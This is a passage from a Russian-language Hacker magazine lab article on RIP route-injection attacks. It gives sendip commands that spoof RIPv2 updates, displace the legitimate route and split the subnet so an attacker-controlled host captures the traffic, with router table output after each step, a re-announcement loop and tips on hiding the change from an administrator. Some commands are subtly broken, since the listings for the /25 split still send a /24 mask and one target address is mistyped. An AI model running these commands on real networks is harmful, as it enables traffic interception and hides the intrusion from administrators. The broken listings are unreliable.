лабораторная работа КОНСТАНТИН ГАВРИЛЕНКО Спецвыпуск: Хакер, номер #066, стр. 066-018-9 [ЭКСПЕРИМЕНТ (продолжение)] Листинг 19. Чтобы избежать прерывания сообщения, вводим свой маршрут arhontus / # sendip -p ipv4 -is 192.168.69.102 -p udp -us 520 -ud 520 -p rip -rv 2 -rc 2 -re 2:0:192.168.10.0:255.255.255.0:192.168.69.102:1 192.168.69.36 Листинг 20. Измененная таблица маршрутизации на хосте М2 R 192.168.10.0/24 [120/1] via 192.168.69.100, 00:00:15, Ethernet0 [120/1] via 192.168.69.102, 00:00:01, Ethernet0 После добавления своего маршрута можно удалять мешающий легитимный маршрут, для чего посылается пакет, как будто бы пришедший с хоста М1, с более высокой метрикой. arhontus / # sendip -p ipv4 -is 192.168.69.100 -p udp -us 520 -ud 520 -p rip -rv 2 -rc 2 -re 2:0:192.168.10.0:255.255.255.0:192.168.69.100:2 192.168.66.36 R 192.168.10.0/24 [120/1] via 192.168.69.102, 00:00:22, Ethernet0 Мы поменяли метрику легитимного маршрута на 2, и маршрутизатор автоматически удалил легитимный маршрут, оставив только введенный. При введении метрики маршрута, равной 16, он будет автоматически удален, даже если ему нет альтернативы. Помни, что по умолчанию оповещения происходят с 30-ти секундным интервалом. И если хочешь, чтобы путь постоянно оставался приоритетным, не забудь оповещать о жизнедеятельности введенного маршрута каждые 30 секунд или чаще. Листинг 21. Отсылка оповещения в цикле arhontus / # while :; do sendip <маршрут> ; sleep 30; done Маршрут, который подвергли удалению, появится в таблице после очередного пакета оповещения, пришедшего с легитимного маршрутизатора, так что можешь включить его удаление в цикл оповещения, если считаешь, что админ часто заходит на маршрутизатор и смотрит таблицу маршрутов. Маршрут, распределенный между двумя маршрутизаторами, имеет гораздо большие шансы привлечь его внимание. [изменение оповещаемой маски маршрута на более специфичную.] Продолжая изменять тот же маршрут, попробуем разделить его на две подсети: 192.168.10.0/25 и 192.168.10.128/25. Тем самым получим приоритет. arhontus / # sendip -p ipv4 -is 192.168.69.102 -p udp -us 520 -ud 520 -p rip -rv 2 -rc 2 -re 2:0:192.168.10.0:255.255.255.0:192.168.69.102:1 192.168.69.36 Листинг 23. Изменение таблицы маршрутизации хоста М2 после первого оповещения 192.168.10.0/24 is variably subnetted, 2 subnets, 2 masks R 192.168.10.0/25 [120/1] via 192.168.69.102, 00:00:01, Ethernet0 R 192.168.10.0/24 [120/1] via 192.168.69.100, 00:00:24, Ethernet0 Листинг 24. Оповещение о том, что вторая половина бывшего целостного сабнета проходит тоже через нас arhontus / # sendip -p ipv4 -is 192.168.69.102 -p udp -us 520 -ud 520 -p rip -rv 2 -rc 2 -re 2:0:192.168.10.0:255.255.255.0:192.168.69.102:1 192.168.69.36 Листинг 25. Изменение таблицы маршрутизации на атакуемой машине 192.168.10.0/24 is variably subnetted, 3 subnets, 2 masks R 192.168.10.0/25 [120/1] via 192.168.69.102, 00:00:022, Ethernet0 R 192.168.10.0/24 [120/1] via 192.168.69.100, 00:00:16, Ethernet0 R 192.168.10.128/25 [120/1] via 192.168.69.102, 00:00:04, Ethernet0 Не пугайся, что в таблице присутствует 192.168.10.0/24 [120/1] via 192.168.69.100. Через этот хост трафик больше не будет передаваться в подсеть, так как наша маска более специфична, она и выбирается при решении о маршрутизации. Если маска оповещаемого маршрута равна 255.255.255.255, указать более конкретную маску невозможно и придется выбирать другие пути решения проблемы. |